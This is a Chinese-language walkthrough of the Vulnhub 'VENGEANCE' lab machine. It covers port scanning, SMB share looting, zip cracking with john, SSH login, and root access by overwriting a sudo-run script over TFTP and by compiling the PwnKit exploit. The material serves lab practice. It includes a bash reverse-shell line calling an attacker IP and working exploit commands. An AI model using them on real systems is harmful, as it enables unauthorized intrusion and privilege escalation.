信息收集
| IP Address | Opening Ports |
|---|---|
| 192.168.101.153 | TCP:80,110,113,139,143,443,445,993,995,22222 |
$ nmap -p- 192.168.101.153 --min-rate 1000 -sC -sV
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
7/tcp closed echo
22/tcp closed ssh
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: VENGEANCE – Confessions of a girl who has been cornered ...
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_auth-owners: www-data
88/tcp closed kerberos-sec
110/tcp open pop3
| fingerprint-strings:
| FourOhFourRequest, LDAPSearchReq:
| +OK Dovecot (Ubuntu) ready.
| -ERR Unknown command.
| -ERR Unknown command.
| LDAPBindReq:
| +OK Dovecot (Ubuntu) ready.
| LPDString:
| +OK Dovecot (Ubuntu) ready.
|_ -ERR Unknown command.
|_pop3-capabilities: CAPA UIDL TOP PIPELINING STLS SASL AUTH-RESP-CODE RESP-CODES
|_auth-owners: dovenull
113/tcp open ident?
|_auth-owners: root
139/tcp open netbios-ssn Samba smbd 4.6.2
|_auth-owners: root
143/tcp open imap Dovecot imapd
|_auth-owners: dovenull
|_imap-capabilities: more LOGINDISABLEDA0001 have IDLE OK ENABLE capabilities LITERAL+ Pre-login listed STARTTLS IMAP4rev1 ID SASL-IR post-login LOGIN-REFERRALS
161/tcp closed snmp
389/tcp closed ldap
443/tcp open ssl/http nginx 1.18.0 (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=VENGEANCE/organizationName=Good Tech Inc/stateOrProvinceName=Singapore/countryName=SG
| Not valid before: 2021-02-14T02:40:28
|_Not valid after: 2022-02-14T02:40:28
| tls-alpn:
| h2
|_ http/1.1
| tls-nextprotoneg:
| h2
|_ http/1.1
|_http-title: VENGEANCE – Confessions of a girl who has been cornered ...
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_auth-owners: www-data
445/tcp open netbios-ssn Samba smbd 4.6.2
|_auth-owners: root
993/tcp open imaps?
995/tcp open pop3s?
1337/tcp closed waste
2049/tcp closed nfs
6000/tcp closed X11
8080/tcp closed http-proxy
22222/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
|_auth-owners: root
| ssh-hostkey:
| 3072 32:eb:05:fa:d3:75:45:5e:c7:72:fb:03:aa:05:b7:d7 (RSA)
| 256 40:16:f8:d1:f1:06:e5:aa:13:44:28:ed:e0:55:ef:34 (ECDSA)
|_ 256 52:78:15:c2:3b:a1:90:20:3a:b1:d6:75:93:72:d8:f8 (ED25519)
54321/tcp closed unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port110-TCP:V=7.92%I=7%D=7/21%Time=669C9A3E%P=x86_64-pc-linux-gnu%r(Fou
SF:rOhFourRequest,4B,"\+OK\x20Dovecot\x20\(Ubuntu\)\x20ready\.\r\n-ERR\x20
SF:Unknown\x20command\.\r\n-ERR\x20Unknown\x20command\.\r\n")%r(LPDString,
SF:34,"\+OK\x20Dovecot\x20\(Ubuntu\)\x20ready\.\r\n-ERR\x20Unknown\x20comm
SF:and\.\r\n")%r(LDAPSearchReq,4B,"\+OK\x20Dovecot\x20\(Ubuntu\)\x20ready\
SF:.\r\n-ERR\x20Unknown\x20command\.\r\n-ERR\x20Unknown\x20command\.\r\n")
SF:%r(LDAPBindReq,1D,"\+OK\x20Dovecot\x20\(Ubuntu\)\x20ready\.\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: -1s
| smb2-time:
| date: 2024-07-21T05:19:11
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
$ enum4linux 192.168.101.153
![[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图](https://img.4awl.net/img/c9/7fbb20d9086744e45e15b25e2a30c1.jpg "[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图")
username:sarausername:qinyi
![[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图1](https://img.4awl.net/img/e3/8c1730e75eb519dbe68e52d9e4b9b3.jpg "[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图1")
本地权限
$ smbclient -L //192.168.101.153/
![[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图2](https://img.4awl.net/img/eb/d1b5724880cb6dae8c5b53d74f36a7.jpg "[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图2")
$ smbclient //192.168.101.153/sarapublic$
smb: \> lcd /tmp/mpsmb: \> recurse ONsmb: \> prompt OFFsmb: \> mget *
![[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图3](https://img.4awl.net/img/2b/3d2b8dd6ddc6cb2271bfe839ee684c.jpg "[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图3")
![[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图4](https://img.4awl.net/img/9e/0a88dd09b8da140bdbbde9ea369f37.jpg "[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图4")
![[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图5](https://img.4awl.net/img/72/ca46e9aaf07765472bd904e46ea360.jpg "[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图5")
$ awk '{for(i=1;i<=NF;i++) print $i}' profile.txt | sort | uniq > password.txt
$ zip2john gio.zip >hash
$ john hash --wordlist=./password.txt
![[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图6](https://img.4awl.net/img/af/4f3ebea199cb69452977d877a58958.jpg "[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图6")
password:nanotechnological
![[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图7](https://img.4awl.net/img/48/15b40ea23bd83cca49d388f1841aea.jpg "[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图7")
![[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图8](https://img.4awl.net/img/ac/5399a47987aa6ab8e7957550b2bab4.jpg "[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图8")
Giovanni
![[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图9](https://img.4awl.net/img/c6/ae6b8ec506b7b8fd4013687f757c6b.jpg "[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图9")
giovanni_130R_Suzuka
![[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图10](https://img.4awl.net/img/c6/134a679b675534201c80cfd029967c.jpg "[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图10")
$ hydra -l user -p 'giovanni_130R_Suzuka' ssh://192.168.101.153:22222
![[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图11](https://img.4awl.net/img/b4/2d6ec22a81624ebc42c187bc183a3e.jpg "[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图11")
![[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图12](https://img.4awl.net/img/d0/0e43c8b551a0cb55fdecc2d144562a.jpg "[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图12")
Local.txt 截屏
![[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图13](https://img.4awl.net/img/db/02ae71b718eda17ec273083288be8c.jpg "[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图13")
Local.txt 内容
Local access to the box obtained.
权限提升
TFTP & SUDO权限提升
$ netstat -lnput
![[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图14](https://img.4awl.net/img/1a/6cc09052e7b70911ade1fbb951b23f.jpg "[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图14")
查看tftp配置文件目录
$ cat /etc/default/tftpd-hpa
![[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图15](https://img.4awl.net/img/ad/d502116b6791262c6063e513471c46.jpg "[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图15")
$ sudo -l
![[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图16](https://img.4awl.net/img/ba/6436cf8ced63ed1791ebaacb2e4a9a.jpg "[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图16")
$ tftp 192.168.101.153 69
tftp> get eaurouge
![[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图17](https://img.4awl.net/img/43/fd11742082d29357d4698b2ab59a50.jpg "[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图17")
通过TFTP上传eaurouge覆盖原来文件
/bin/bash -c 'bash -i >& /dev/tcp/192.168.101.128/10032 0>&1'
![[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图18](https://img.4awl.net/img/b8/2f88178e3e94de904566bc1f214473.jpg "[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图18")
$ tftp 192.168.101.153 69
tftp> put eaurouge
$ sudo /home/sara/private/eaurouge
![[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图19](https://img.4awl.net/img/27/2c2f3e2aba2de61791d16f3e00f458.jpg "[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图19")
PwnKit:pkexec 权限提升
[Kali]$ wget https://github.com/ly4k/PwnKit/blob/main/PwnKit.c
[Kali]$ gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC
[Target]$ ./PwnKit
![[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图20](https://img.4awl.net/img/09/ef3f9f9957734f4025b41a9f7e9f9e.jpg "[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图20")
Proof.txt 截屏
![[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图21](https://img.4awl.net/img/74/85f89a312f24432a1372a45c90830f.jpg "[Vulnhub] VENGEANCE SMB+Zip-Crack+TFTP&SUDO权限提升+Pw…插图21")
Proof.txt Content
Root access obtained! Congratulations on breaking through the 6th box in the digitalworld.local series. Hope you enjoyed this one.
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
